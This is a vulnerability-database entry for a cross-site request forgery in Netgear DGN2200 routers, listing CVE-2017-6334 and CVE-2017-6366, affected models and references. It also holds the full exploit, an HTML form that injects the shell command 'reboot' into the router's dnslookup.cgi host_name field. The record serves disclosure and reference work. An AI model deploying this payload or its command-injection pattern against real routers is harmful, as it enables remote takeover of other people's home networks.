ID
VAR-E-201702-0147
CVE
| cve_id: | CVE-2017-6334 | Trust: 2.3 |
| cve_id: | CVE-2017-6366 | Trust: 1.0 |
EDB ID
41472
TITLE
Netgear DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Netgear DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery. CVE-2017-6334CVE-2017-6366 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | netgear | model: | dgn2200v1/v2/v3/v4 | scope: | - | version: | - | Trust: 1.6 |
| vendor: | netgear | model: | dgn2200 dnslookup.cgi | scope: | - | version: | - | Trust: 0.5 |
| vendor: | netgear | model: | dgn2201 dnslookup.cgi remote | scope: | eq | version: | v1/v2/v3/v4 | Trust: 0.5 |
| vendor: | netgear | model: | dgn2200v4 | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | netgear | model: | dgn2200v3 | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | netgear | model: | dgn2200v2 | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | netgear | model: | dgn2200v1 | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
# Exploit Title: NETGEAR Firmware DGN2200v1/v2/v3/v4 CSRF which leads to RCE through CVE-2017-6334
# Date: 2017-02-28
# Exploit Author: SivertPL
# Vendor Homepage: http://netgear.com/
# Software Link: http://www.downloads.netgear.com/files/GDC/DGN2200/DGN2200%20Firmware%20Version%201.0.0.20%20-%20Initial%20Release%20(NA).zip
# Version: 10.0.0.20 (initial) - 10.0.0.50 (latest, still 0-day!)
# Tested on: DGN2200v1,v2,v3,v4
# CVE: CVE-2017-6366
A quite dangerous CSRF was discovered on all DGN2200 firmwares.
When chained with either CVE-2017-6077 or CVE-2017-6334, allows for unauthenticated (sic!) RCE after tricking somebody logged in to the router to view a website.
<!DOCTYPE html>
<html>
<title>netgear router CSRF</title>
<body>
<form method="POST" action="http://192.168.0.1/dnslookup.cgi">
<input type="hidden" name="host_name" value="www.google.com; reboot"> <!-- CVE-2017-6334 payload -->
<input type="hidden" name="lookup" value="Lookup">
<button name="clc" value="clc">Would You Dare To?</button>
</form>
</body>
</html>
<!-- 2017-02-27 by SivertPL -->
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery
Trust: 1.6
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | remote | Trust: 0.5 |
| tag: | cgi | Trust: 0.5 |
CREDITS
SivertPL
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2017-6334 | Trust: 2.3 |
| db: | EXPLOIT-DB | id: | 41472 | Trust: 1.6 |
| db: | NVD | id: | CVE-2017-6366 | Trust: 1.0 |
| db: | EDBNET | id: | 91672 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 143128 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 141337 | Trust: 0.5 |
| db: | BID | id: | 96463 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-6334 | Trust: 2.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-6366 | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/41472/ | Trust: 0.6 |
| url: | http://www.netgear.com | Trust: 0.3 |
SOURCES
| db: | BID | id: | 96463 |
| db: | PACKETSTORM | id: | 143128 |
| db: | PACKETSTORM | id: | 141337 |
| db: | EXPLOIT-DB | id: | 41472 |
| db: | EDBNET | id: | 91672 |
LAST UPDATE DATE
2022-07-27T09:11:33.421000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 96463 | date: | 2017-03-07T01:08:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 96463 | date: | 2017-02-26T00:00:00 |
| db: | PACKETSTORM | id: | 143128 | date: | 2017-06-24T17:45:41 |
| db: | PACKETSTORM | id: | 141337 | date: | 2017-02-26T05:55:55 |
| db: | EXPLOIT-DB | id: | 41472 | date: | 2017-02-28T00:00:00 |
| db: | EDBNET | id: | 91672 | date: | 2017-02-28T00:00:00 |